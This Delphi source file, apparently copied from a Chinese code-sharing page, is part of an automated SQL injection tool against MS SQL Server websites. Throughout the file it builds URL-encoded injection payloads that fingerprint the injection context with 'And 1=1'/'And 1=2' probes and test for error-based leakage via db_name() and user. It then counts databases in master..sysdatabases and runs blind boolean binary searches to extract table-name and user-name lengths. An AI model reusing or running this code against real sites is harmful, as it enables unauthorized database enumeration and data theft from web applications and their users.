📄 cjdatabase_unit.pas
字号:
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try
result:=define_unit.GetURLMsg(URL);
except on E:Exception do
Application.MessageBox(pchar('读取数据库名时出错'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
function GetDatabaseCount(str_url:string):integer;
var
str_count:string;
str_ext:string;
begin
if str_url='' then
begin
//Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
exit;
end;
case cjdatabase_unit.Inject_methord of
0:exit;
1:str_ext:='%20and%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(100))%2Bchar(94)%20from%20[master]..[sysdatabases])>0';
2:str_ext:='''%20and%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(100))%2Bchar(94)%20from%20[master]..[sysdatabases])>0%20and%20''''=''';
end;
try
str_count:=define_unit.GetURLMsg(str_url+str_ext);
if str_count<>'未知' then
result:=strtoint(str_count);
except
end;
end;
//******************************************************************************
function Inject_method(str_url:string):integer;
var
found:integer;
str_ext1,str_ext2,str_ext3:string;
str_ext4,str_ext5,str_ext6:string;
begin
result:=0;
try
str_ext1:='%20And%201=1';
str_ext4:='%20And%201=2';
if (define_unit.GetURLCode(str_url+str_ext1)=200) and (define_unit.GetURLCode(str_url+str_ext4)=500) then
begin
//cjdatabase_unit.Inject_methord:=1;
//cjdatabase_unit.Database_methord:=2;
result:=1;
exit;
end;
str_ext2:='''%20And%201=1%20And%20''''=''';
str_ext5:='''%20And%201=2%20And%20''''=''';
if (define_unit.GetURLCode(str_url+str_ext2)=200) and (define_unit.GetURLCode(str_url+str_ext5)=500) then
begin
//cjdatabase_unit.Inject_methord:=2;
//cjdatabase_unit.Database_methord:=2;
result:=2;
exit;
end;
str_ext3:='%25''%20And%201=1%20And%20''%25''=''';
str_ext6:='%25''%20And%201=2%20And%20''%25''=''';
if (define_unit.GetURLCode(str_url+str_ext3)=200) and (define_unit.GetURLCode(str_url+str_ext6)=500) then
begin
//cjdatabase_unit.Inject_methord:=3;
//cjdatabase_unit.Database_methord:=2;
result:=3;
exit;
end;
except on E:Exception do
Application.MessageBox(pchar('猜解注入方式时出现错误'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
//******************************************************************************
//暴力破解用的函数
function b(min_num,max_num:integer;iTop:integer;iPos:integer;URL:string;sContent:string):integer;
var
i:integer;
middle:integer;
begin
result:=0;
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if a(middle,iTop,iPos,URL,sContent,3) then //如果小于max,就继续缩小max的范围
begin
max_num:=middle;
end
else //如果不小于max,就把min的范围扩大
begin
min_num:=middle;
end;
end;
for i:=min_num to max_num do
begin
if a(i,iTop,iPos,URL,sContent,4) then
begin
result:=i-1;
break;
end;
end ;
end;
//******************************************************************************
//暴力破解的函数
function UserlenA(max_num:integer;str_url:string;iPos:integer;sContent:string;btype:integer):boolean;
var
str_ext:string;
URL:string;
content:string;
begin
//*****************
result:=false;
//case btype of
//1: begin
str_ext:=' and (select len(user))<'+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
//Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:=''' '+str_ext+' and ''''=''';
3 :
URL:='%'' '+str_ext+' and ''%''=''';
end;
// end;
{2: begin
str_ext:=' and (select ascii(substring(user,'+inttostr(iPos)+',1)))<'+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:=''' '+str_ext+' and ''''=''';
3 :
URL:='%'' '+str_ext+' and ''%''=''';
end;
end;
end;}
//*****************
URL:=define_unit.SQLINJECTIONUrlToHex(URL,0);
//如果是关键字方式,采用关键字搜索猜解
if Form_main.CheckBox_keyword.Checked=true then
begin
content:=define_unit.GetURLContent(str_url+URL);
if pos(trim(Form_main.Edit_keyword.Text),content)>0 then
result:=true
else
result:=false;
end
else
begin
if define_unit.GetURLCode(str_url+URL)=200 then
result:=true
else
result:=false;
end;
end;
//******************************************************************************
//暴力破解用的函数
function UserCharLenB(min_num,max_num:integer;iPos:integer;URL:string;sContent:string):integer;
var
i:integer;
middle:integer;
begin
result:=0;
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if UserlenA(middle,URL,iPos,sContent,2) then //如果小于max,就继续缩小max的范围
begin
max_num:=middle;
end
else //如果不小于max,就把min的范围扩大
begin
min_num:=middle;
end;
end;
for i:=min_num to max_num do
begin
if UserlenA(i,URL,iPos,sContent,2) then
begin
result:=i-1;
break;
end;
end ;
end;
//******************************************************************************
//暴力破解用的函数
function a(max_num:integer;iTop:integer;iPos:integer;URL:string;sContent:string;btype:integer):boolean;
var
sql_str:string;
encode_sql_str:string;
content:string;
icode:integer;
label start;
begin
result:=false;
sql_str:=' and (Select top 1 len(name) from(Select top '+inttostr(iTop)+' id,name from ['+define_unit.FDbName+']..sysobjects where xtype=char(85)) T order by id desc) < '+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
sql_str:=sql_str;
2 :
sql_str:=''' '+sql_str+' and ''''=''';
3 :
sql_str:='%'' '+sql_str+' and ''%''=''';
end;
encode_sql_str:=define_unit.SQLINJECTIONUrlToHex(sql_str,0);
if Form_main.CheckBox_keyword.Checked=true then
begin
content:=define_unit.GetURLContent(URL+encode_sql_str);
if pos(trim(Form_main.Edit_keyword.Text),content)>0 then
result:=true
else
result:=false;
end
else
begin
start:
icode:=define_unit.GetURLCode(URL+encode_sql_str);
if icode=200 then
result:=true
else
begin
if icode= 500 then
result:=false
else
begin
//sleep(1000);
goto start;
end;
end;
end;
end;
//******************************************************************************
//暴力破解用的函数,函数判断表的字符长度
function GetTableCharLen(iTop:integer;URL:string;sContent:string):integer;
var
i:integer;
min,max :integer;
middle:integer;
//sContent:string;
begin
min:=1 ;
max:=40;
result:=0;
//首先获得注入地址的有效界面
{if sContent='' then
begin
Application.MessageBox(pchar('从注入地址不能获得有效的页面,无法猜解表的长度,退出'),pchar('提示'),mb_ok+mb_iconinformation);
exit;
end ; }
for i:=min to max do
begin
if max-min<=2 then
begin
break;
end;
middle:=((max-min) div 2)+min;
if a(middle,iTop,0,URL,sContent,1) then //如果小于max,就继续缩小max的范围
begin
max:=middle;
end
else //如果不小于max,就把min的范围扩大
begin
min:=middle;
end;
end;
//循环得出表的字符长度
for i:=min+1 to max do
begin
if a(i,iTop,0,URL,sContent,1) then
begin
result:=i-1;
break;
end;
end ;
end;
//******************************************************************************
//判断注入方式及是否抱错
function IfErrorReport(str_url:string):integer;
var
str_ext1,str_ext2,str_ext3:string;
begin
result:=0;
//cjdatabase_unit.Inject_methord:=0;
//cjdatabase_unit.Database_methord:=0;
//根据不同的注入方式构造sql
str_ext1:='%20and(char(94)%2Bdb_name()%2Bchar(94))>0';
if define_unit.GetURLMsgBool(str_url+str_ext1) then
begin
result:=1;
//cjdatabase_unit.Inject_methord:=1;
//cjdatabase_unit.Database_methord:=1;
exit;
end;
str_ext2:='''%20and(char(94)%2Buser%2Bchar(94))>0%20and%20''''=''';
if define_unit.GetURLMsgBool(str_url+str_ext2) then
begin
result:=2;
//cjdatabase_unit.Inject_methord:=2;
//cjdatabase_unit.Database_methord:=1;
exit;
end;
str_ext3:='%25''%20and(char(94)%2Buser%2Bchar(94))>0%20and%20''%25''=''';
if define_unit.GetURLMsgBool(str_url+str_ext3) then
begin
result:=3;
//cjdatabase_unit.Inject_methord:=3;
//cjdatabase_unit.Database_methord:=1;
exit;
end;
end;
//******************************************************************************
//暴力破解用的函数,获得用户字符串的长度
function GetUserCharLen(str_url:string;sContent:string):integer;
var
str_ext:string;
//URL:string;
middle,min_num,max_num:integer;
i:integer;
begin
min_num:=1;
max_num:=64;
result:=0;
//首先获得注入地址的有效界面
{if sContent='' then
begin
Application.MessageBox(pchar('从注入地址不能获得有效的页面,无法猜解表的长度,退出'),pchar('提示'),mb_ok+mb_iconinformation);
exit;
end ; }
//***********************
//获取表的长度范围
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if UserLenA(middle,str_url,0,sContent,1) then //如果小于max,就继续缩小max的范围
begin
max_num:=middle;
end
else //如果不小于max,就把min的范围扩大
begin
min_num:=middle;
end;
end;
//循环得出表的字符长度
for i:=min_num+1 to max_num do
begin
if UserLenA(i,str_url,0,sContent,1) then
begin
result:=i-1;
break;
end;
end ;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -